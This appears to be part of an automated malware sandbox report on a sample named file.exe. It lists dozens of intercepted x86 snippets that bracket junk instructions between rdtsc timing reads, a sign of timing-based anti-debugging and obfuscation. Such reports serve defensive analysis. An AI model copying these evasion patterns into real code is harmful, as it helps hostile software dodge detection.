                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB5C9B second address: AB5CA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB5CA1 second address: AB5CAB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F33B8517E9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB5CAB second address: AB5CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 je 00007F33B8C7430Fh 0x0000000d pushad 0x0000000e jmp 00007F33B8C74301h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB5CCC second address: AB5CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 clc 0x00000007 push 00000000h 0x00000009 sbb cl, 00000040h 0x0000000c push B919429Fh 0x00000011 jnc 00007F33B8517EB2h 0x00000017 push eax 0x00000018 push edx 0x00000019 jg 00007F33B8517E96h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB5CEB second address: AB5D46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74300h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 46E6BDE1h 0x00000010 mov dword ptr [ebp+122D323Dh], esi 0x00000016 push 00000003h 0x00000018 xor edx, 6EBB74BBh 0x0000001e sub si, A257h 0x00000023 push 00000000h 0x00000025 or edi, dword ptr [ebp+122D2A62h] 0x0000002b push 00000003h 0x0000002d mov dword ptr [ebp+122D1D6Fh], eax 0x00000033 push 43EDAF25h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F33B8C74305h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB6019 second address: AB6028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB6028 second address: AB6047 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F33B8C742F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e jmp 00007F33B8C742FDh 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94C69 second address: A94C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F33B8517E96h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94C77 second address: A94C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C742FCh 0x00000009 ja 00007F33B8C742F6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94C90 second address: A94CB6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F33B8517EA3h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007F33B8517E96h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5222 second address: AD5227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5227 second address: AD522D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD546D second address: AD5475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5475 second address: AD548A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F33B8517E9Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD55DB second address: AD55F0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F33B8C742FBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD55F0 second address: AD55F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD55F4 second address: AD55FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD55FC second address: AD5619 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F33B8517EA8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5619 second address: AD5644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jns 00007F33B8C742F6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jmp 00007F33B8C74308h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5644 second address: AD564E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F33B8517E9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD57B3 second address: AD57B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5908 second address: AD5939 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F33B8517EA0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jmp 00007F33B8517EA4h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5D92 second address: AD5D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD603C second address: AD605D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8517E9Ah 0x00000009 popad 0x0000000a jmp 00007F33B8517EA2h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD605D second address: AD6062 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD62FA second address: AD62FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA59D4 second address: AA59DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA59DA second address: AA59FD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F33B8517EA3h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA59FD second address: AA5A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6B94 second address: AD6B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD87C5 second address: AD87CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD87CA second address: AD87F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F33B8517E96h 0x0000000a jmp 00007F33B8517E9Ah 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jl 00007F33B8517EB5h 0x0000001e push eax 0x0000001f push edx 0x00000020 je 00007F33B8517E96h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD87F5 second address: AD87F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADB336 second address: ADB33A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADB6CF second address: ADB6EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74302h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A983A1 second address: A983B6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jbe 00007F33B8517E96h 0x00000011 pop edi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A983B6 second address: A983CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F33B8C742F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e jbe 00007F33B8C74313h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A983CE second address: A983D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F099 second address: A9F0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C74302h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F0B1 second address: A9F0BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F33B8517E96h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE271C second address: AE2722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2722 second address: AE2749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F33B8517EA2h 0x00000010 jp 00007F33B8517E96h 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2749 second address: AE2760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F33B8C742F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f jng 00007F33B8C7430Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2760 second address: AE2787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8517EA2h 0x00000009 pushad 0x0000000a jp 00007F33B8517E96h 0x00000010 push eax 0x00000011 pop eax 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 push edi 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2787 second address: AE27A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F33B8C742F6h 0x0000000d jmp 00007F33B8C74305h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2900 second address: AE2904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2904 second address: AE290E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F33B8C742F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2EC3 second address: AE2EC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3011 second address: AE302A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C742FBh 0x00000009 pop ecx 0x0000000a pushad 0x0000000b js 00007F33B8C742F6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE302A second address: AE3047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jns 00007F33B8517E96h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F33B8517E9Eh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5A70 second address: AE5A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5A74 second address: AE5A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5A78 second address: AE5A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F33B8C742F8h 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push edx 0x00000012 pushad 0x00000013 jno 00007F33B8C742F6h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pop edx 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5A9E second address: AE5B17 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F33B8517EA1h 0x0000000f popad 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007F33B8517EA7h 0x00000019 pop eax 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F33B8517E98h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 push 1EA4629Fh 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F33B8517EA8h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5B17 second address: AE5B1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5C57 second address: AE5C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5EE0 second address: AE5EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6185 second address: AE618A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6671 second address: AE6688 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C742FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6688 second address: AE668E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE668E second address: AE6692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE66F7 second address: AE6707 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6707 second address: AE670D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6B6A second address: AE6B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6BED second address: AE6BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6BF1 second address: AE6C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F33B8517EA6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edi 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7263 second address: AE7268 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE72EC second address: AE72F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9CD1 second address: AE9D01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74301h 0x00000007 pushad 0x00000008 jmp 00007F33B8C74308h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA2F0 second address: AEA2F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEAD38 second address: AEAD4E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007F33B8C742F6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F33B8C742F6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB7DB second address: AEB811 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c jbe 00007F33B8517E9Eh 0x00000012 jo 00007F33B8517E98h 0x00000018 pushad 0x00000019 popad 0x0000001a nop 0x0000001b add edi, 5C1648AFh 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 mov di, dx 0x00000028 xchg eax, ebx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F33B8517E9Ah 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB811 second address: AEB83D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C742FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F33B8C74301h 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB5A0 second address: AEB5A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDE8B second address: AEDEAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74303h 0x00000007 jnc 00007F33B8C742F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEC0F1 second address: AEC108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F33B8517EA3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDEAC second address: AEDEB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDEB0 second address: AEDEB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE4C5 second address: AEE518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F33B8C74306h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F33B8C742F8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov esi, dword ptr [ebp+122D2842h] 0x0000002f push 00000000h 0x00000031 cld 0x00000032 push 00000000h 0x00000034 stc 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b pop eax 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE518 second address: AEE522 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99F02 second address: A99F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C74300h 0x00000009 jmp 00007F33B8C742FCh 0x0000000e popad 0x0000000f jl 00007F33B8C742FCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2504 second address: AF252A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F33B8517EA3h 0x0000000c jmp 00007F33B8517E9Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF4AC1 second address: AF4AC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF4B4B second address: AF4B6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F33B8517EA9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF4B6E second address: AF4B78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F33B8C742F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5C50 second address: AF5C54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5C54 second address: AF5C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5C5A second address: AF5C86 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F33B8517E9Ch 0x00000008 jl 00007F33B8517E96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F33B8517EA9h 0x00000018 rdtsc
